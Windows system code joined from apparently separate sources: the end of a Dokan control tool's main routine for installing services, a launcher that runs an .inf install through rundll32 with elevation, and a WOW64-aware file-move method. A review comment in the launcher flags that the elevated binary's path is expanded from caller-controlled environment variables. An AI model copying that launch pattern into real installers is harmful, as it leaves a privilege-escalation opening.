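  // GetModuleFileName returns 0 on failure and the buffer size when the
  // path was truncated; in both cases the buffer must not be trusted.
  copied = GetModuleFileName(NULL, fileName, MAX_PATH);
  if (copied != 0 && copied < MAX_PATH) {
    // cut the string at the last "\" to keep only the directory
    lastSeparator = wcsrchr(fileName, L'\\');
    if (lastSeparator != NULL) {
      *lastSeparator = L'\0';
    } else {
      fileName[0] = L'\0';
    }

    // Check the length first: wcscat_s would otherwise invoke the invalid
    // parameter handler when the result does not fit.
    if (wcslen(fileName) + wcslen(mounterName) < MAX_PATH) {
      wcscpy_s(mounterFullPath, MAX_PATH, fileName);
      wcscat_s(mounterFullPath, MAX_PATH, mounterName);
      mounterPathValid = TRUE;
    }
  }
  fwprintf(stderr, L"Mounter path: '%s'\n", mounterFullPath);

  // ExpandEnvironmentStringsW returns 0 on failure and a value larger than
  // the buffer size when the expanded string did not fit.
  copied = ExpandEnvironmentStringsW(DOKAN_DRIVER_FULL_PATH, driverFullPath,
                                     MAX_PATH);
  if (copied != 0 && copied <= MAX_PATH) {
    driverPathValid = TRUE;
  } else {
    driverFullPath[0] = L'\0';
  }
  fwprintf(stderr, L"Driver path: '%s'\n", driverFullPath);

  if (GetOption(argc, argv, 1) == L'v') {
    fprintf(stderr, "dokanctl : %s %s\n", __DATE__, __TIME__);
    fprintf(stderr, "Dokan version : %d\n", DokanVersion());
    fprintf(stderr, "Dokan driver version : 0x%lx\n", DokanDriverVersion());
    return EXIT_SUCCESS;

  } else if (GetOption(argc, argv, 1) == L'm') {
    return ShowMountList();

  } else if (GetOption(argc, argv, 1) == L'u' && argc == 3) {
    return Unmount(argv[2], FALSE);

  } else if (GetOption(argc, argv, 1) == L'u' &&
             GetOption(argc, argv, 3) == L'f' && argc == 4) {
    return Unmount(argv[2], TRUE);

  } else if (argc < 3 || wcslen(argv[1]) != 2 || argv[1][0] != L'/') {
    return ShowUsage();
  }

  // argc >= 3 is guaranteed here, so argv[2] exists.
  type = towlower(argv[2][0]);

  switch (towlower(argv[1][1])) {
  case L'i':
    if (type == L'd') {
      if (!driverPathValid) {
        fprintf(stderr, "driver path could not be resolved\n");
        return EXIT_FAILURE;
      }
      return InstallDriver(driverFullPath);

    } else if (type == L's') {
      if (!mounterPathValid) {
        fprintf(stderr, "mounter path could not be resolved\n");
        return EXIT_FAILURE;
      }
      return InstallMounter(mounterFullPath);

    } else if (type == L'a') {
      // Validate both paths before installing anything, so a bad mounter
      // path does not leave only the driver installed.
      if (!driverPathValid || !mounterPathValid) {
        fprintf(stderr, "driver or mounter path could not be resolved\n");
        return EXIT_FAILURE;
      }
      if (InstallDriver(driverFullPath) == EXIT_FAILURE)
        return EXIT_FAILURE;

      if (InstallMounter(mounterFullPath) == EXIT_FAILURE)
        return EXIT_FAILURE;
    } else if (type == L'n') {
      if (DokanNetworkProviderInstall())
        fprintf(stderr, "network provider install ok\n");
      else
        fprintf(stderr, "network provider install failed\n");
    }
    break;

  case L'r':
    if (type == L'd') {
      return DeleteDokanService(DOKAN_DRIVER_SERVICE);

    } else if (type == L's') {
      return DeleteDokanService(DOKAN_MOUNTER_SERVICE);

    } else if (type == L'a') {
      if (DeleteDokanService(DOKAN_MOUNTER_SERVICE) == EXIT_FAILURE)
        return EXIT_FAILURE;

      if (DeleteDokanService(DOKAN_DRIVER_SERVICE) == EXIT_FAILURE)
        return EXIT_FAILURE;
    } else if (type == L'n') {
      if (DokanNetworkProviderUninstall())
        fprintf(stderr, "network provider remove ok\n");
      else
        fprintf(stderr, "network provider remove failed\n");
    }
    break;

  case L'd':
    // debug mode is a single decimal digit
    if (L'0' <= type && type <= L'9') {
      ULONG mode = type - L'0';
      if (DokanSetDebugMode(mode)) {
        fprintf(stderr, "set debug mode ok\n");
      } else {
        fprintf(stderr, "set debug mode failed\n");
      }
    }
    break;

  default:
    fprintf(stderr, "unknown option\n");
  }

  return EXIT_SUCCESS;
}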
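// we don't need any runtime initialization; only use Win32 API!
//
// Raw process entry point: takes the .inf path from the command line,
// resolves it to a full path and runs
//   rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 <path>
// through ShellExecuteEx (with the "runas" verb on Vista and later), then
// exits with the child's exit code.
//
// Exit codes produced by this launcher itself:
//   0xFE  the path could not be resolved
//   0xFD  only a directory was specified
//   0xFC  out of memory
//   0xFB  rundll32 could not be started or its exit code could not be read
//
// NOTE(review): the program to launch is given as
// "%SystemRoot%\system32\rundll32.exe" and expanded from this process's
// environment (SEE_MASK_DOENVSUBST). The environment block is inherited from
// whoever started this launcher, so on Vista+ the binary offered for
// elevation is selected by a value the caller controls. Building the path
// from GetSystemDirectory() would remove that dependency.
void __cdecl WinMainCRTStartup(void) {
	// variable for ExitProcess
	UINT exitCode;
	DWORD childExitCode;

	// variables for Tokenize
	LPTSTR infName;

	// variables for GetFullPathName
	LPTSTR fullPath = NULL;
	LPTSTR filePart = NULL;
	DWORD resolvedLen;

	// variables for lstrcpy, lstrcat
	DWORD len;
	LPTSTR fixCmd;
	LPTSTR argList = NULL;

	// variables for ShellExecuteEx
	SHELLEXECUTEINFO shExec;

	// variables for Wow64DisableWow64FsRedirection
	PVOID OldWow64FsRedirectionValue = NULL;
	BOOL redirectionDisabled = FALSE;

	// variables for VerifyVersionInfo
	OSVERSIONINFOEX verInfo;

	// declare these functions as pointers to load dynamically
	PW64DW64FR Wow64DisableWow64FsRedirection;
	PW64RW64FR Wow64RevertWow64FsRedirection;

	// attempt to load functions and store pointer in variable; they are
	// looked up at run time because they do not exist on every system
	Wow64DisableWow64FsRedirection = (PW64DW64FR) GetProcAddress(
			GetModuleHandle(TEXT("kernel32.dll")),
			"Wow64DisableWow64FsRedirection");
	Wow64RevertWow64FsRedirection = (PW64RW64FR) GetProcAddress(
			GetModuleHandle(TEXT("kernel32.dll")),
			"Wow64RevertWow64FsRedirection");

	// get the command line buffer from the environment
	infName = Tokenize (GetCommandLine ());

	// standard prefix to run an installer. first argument is a tuple of
	// the library name and the entry point; there must be a comma
	// between them and no spaces. rest of the command is passed to that
	// entry point. DefaultInstall is the name of the section, 128 is
	// flags, and the .inf name must be specified using a path to avoid
	// having it search for files in default directories.
	fixCmd = TEXT("setupapi.dll,InstallHinfSection DefaultInstall 128 ");

	// get canonical path of the argument; the first call only asks for
	// the required buffer size
	len = GetFullPathName (infName, 0, NULL, NULL);
	// path could not be resolved? fullPath is still NULL here, which the
	// cleanup code below accounts for
	if (len == 0) {
		exitCode = 0xFE;
		goto cleanupFullPath;
	}
	fullPath = (LPTSTR) HeapAlloc (GetProcessHeap (), 0, (len+1) * sizeof(TCHAR));
	if (fullPath == NULL) {
		exitCode = 0xFC;
		goto cleanupFullPath;
	}
	resolvedLen = GetFullPathName (infName, len, fullPath, &filePart);
	// 0 is failure; a value >= len means the buffer was too small
	if (resolvedLen == 0 || resolvedLen >= len) {
		exitCode = 0xFE;
		goto cleanupFullPath;
	}
	// only directory was specified; GetFullPathName stores a NULL file
	// part pointer when the path names a directory
	if (filePart == NULL || *filePart == '\0') {
		exitCode = 0xFD;
		goto cleanupFullPath;
	}

	// put all portions together to a total command line. note that the
	// InstallHinfSection argument list is not a regular command line. there
	// are always three fields: Section (DefaultInstall), Flags (128) and
	// Path, which are separated with a space. No quotes should be put around
	// the path, nor is the short name really necessary (on Windows 7 64-bit
	// there may not be a short name version available).
	len = lstrlen (fixCmd) + lstrlen (fullPath);
	argList = (LPTSTR) HeapAlloc (GetProcessHeap (), 0, (len+1) * sizeof(TCHAR));
	if (argList == NULL) {
		exitCode = 0xFC;
		goto cleanupFullPath;
	}
	lstrcpy (argList, fixCmd);
	lstrcat (argList, fullPath);
	//MessageBox(NULL, argList, TEXT("argList"), MB_ICONINFORMATION | MB_OK);

	ZeroFill (&shExec, sizeof(SHELLEXECUTEINFO));
	shExec.cbSize = sizeof(SHELLEXECUTEINFO);
	shExec.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_DDEWAIT | SEE_MASK_DOENVSUBST;

	// <http://codefromthe70s.org/vistatutorial.aspx>
	// <http://www.wintellect.com/cs/blogs/jrobbins/archive/2007/03/27/elevate-a-process-at-the-command-line-in-vista.aspx>
	ZeroFill (&verInfo, sizeof(OSVERSIONINFOEX));
	verInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
	verInfo.dwMajorVersion = 6; // Vista
	if (VerifyVersionInfo (&verInfo, VER_MAJORVERSION,
			VerSetConditionMask (0, VER_MAJORVERSION, VER_GREATER_EQUAL))) {
		shExec.lpVerb = TEXT("runas");
	}

	// instead of calling InstallHinfSection ourself, we need to execute
	// the external program so that the native version (32- or 64-bits)
	// is run. it is always in system32, even on Windows x64! (folder
	// redirection is deactivated, so we'll get the native version).
	shExec.lpFile = TEXT("%SystemRoot%\\system32\\rundll32.exe");
	shExec.lpParameters = argList;
	shExec.nShow = SW_SHOWDEFAULT;

	// only call the WoW64 functions if they are available on our system,
	// and remember whether the state was actually changed
	if (NULL != Wow64DisableWow64FsRedirection) {
		if (Wow64DisableWow64FsRedirection (&OldWow64FsRedirectionValue))
			redirectionDisabled = TRUE;
	}

	// launch process and "inherit" exit code; without a process handle
	// there is nothing to wait for and no exit code to read
	exitCode = 0xFB;
	if (ShellExecuteEx (&shExec) && shExec.hProcess != NULL) {
		WaitForSingleObject (shExec.hProcess, INFINITE);
		if (GetExitCodeProcess (shExec.hProcess, &childExitCode))
			exitCode = (UINT) childExitCode;
		CloseHandle (shExec.hProcess);
	}

	// restore redirection only with a value that the disable call filled in
	if (redirectionDisabled && NULL != Wow64RevertWow64FsRedirection)
		Wow64RevertWow64FsRedirection (OldWow64FsRedirectionValue);

cleanupFullPath:
	// not really necessary, but it's a habit hard to turn
	if (argList != NULL)
		HeapFree (GetProcessHeap (), 0, argList);
	if (fullPath != NULL)
		HeapFree (GetProcessHeap (), 0, fullPath);

	ExitProcess (exitCode);
}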
/**
 * Moves a file with MoveFileEx, compensating for WOW64 file-system
 * redirection when m_bIsWow64 is set.
 *
 * @param lpExistingFileName  source path; NULL is rejected with
 *                            ERROR_INVALID_PARAMETER
 * @param lpNewFileName       destination path; may be NULL, in which case
 *                            NULL is passed on to MoveFileEx
 * @param dwFlags             flags forwarded unchanged to MoveFileEx
 * @return the MoveFileEx result, or FALSE when a directory lookup or the
 *         redirection disable/revert call fails
 */
BOOL CFileMove::MoveFile(LPCTSTR lpExistingFileName, LPCTSTR lpNewFileName, DWORD dwFlags)
{
	if (NULL == lpExistingFileName)
	{
		::SetLastError(ERROR_INVALID_PARAMETER);
		return FALSE;
	}

	// Remove the read-only attribute from both paths
	RemoveReadonlyAttribute(lpExistingFileName);
	RemoveReadonlyAttribute(lpNewFileName);

	// No redirection to work around: plain move
	if (!m_bIsWow64)
	{
		return MoveFileEx(lpExistingFileName, lpNewFileName, dwFlags);
	}

	// Collect the three directory names the path rewriting works with
	TCHAR wow64Dir[MAX_PATH] = {0};
	if (!GetWow64Directory(wow64Dir, countof(wow64Dir)))
	{
		return FALSE;
	}

	TCHAR system32Dir[MAX_PATH] = {0};
	if (!GetSystemDirectory(system32Dir, countof(system32Dir)))
	{
		return FALSE;
	}

	TCHAR sysnativeDir[MAX_PATH] = {0};
	if (!GetWindowsDirectory(sysnativeDir, countof(sysnativeDir)))
	{
		return FALSE;
	}
	StringCchCat(sysnativeDir, countof(sysnativeDir), _T("\\Sysnative"));

	// Rewrite the paths in two passes. RevertFsRedirection is defined
	// elsewhere; presumably it maps a path under the second argument to the
	// third (System32 -> SysWOW64, then Sysnative -> System32), so the
	// paths still name the same files once redirection is off - confirm.
	TCHAR sourcePath[MAX_PATH] = {0};
	TCHAR targetPath[MAX_PATH] = {0};
	LPCTSTR pTargetArg = NULL;

	RevertFsRedirection(lpExistingFileName, system32Dir, wow64Dir, sourcePath, countof(sourcePath));
	RevertFsRedirection(sourcePath, sysnativeDir, system32Dir, sourcePath, countof(sourcePath));

	if (NULL != lpNewFileName)
	{
		RevertFsRedirection(lpNewFileName, system32Dir, wow64Dir, targetPath, countof(targetPath));
		RevertFsRedirection(targetPath, sysnativeDir, system32Dir, targetPath, countof(targetPath));
		pTargetArg = targetPath;
	}

	// Turn off automatic redirection for 32-bit programs on 64-bit systems
	PVOID pSavedState = NULL;
	if (!Wow64DisableWow64FsRedirection(&pSavedState))
	{
		return FALSE;
	}

	// Capture the move's error code now: the revert call below may
	// overwrite the thread's last-error value
	const BOOL bMoved = MoveFileEx(sourcePath, pTargetArg, dwFlags);
	const DWORD dwMoveError = bMoved ? ERROR_SUCCESS : ::GetLastError();

	// Restore automatic redirection for 32-bit programs on 64-bit systems
	if (!Wow64RevertWow64FsRedirection(pSavedState))
	{
		return FALSE;
	}

	::SetLastError(dwMoveError);
	return bMoved;
}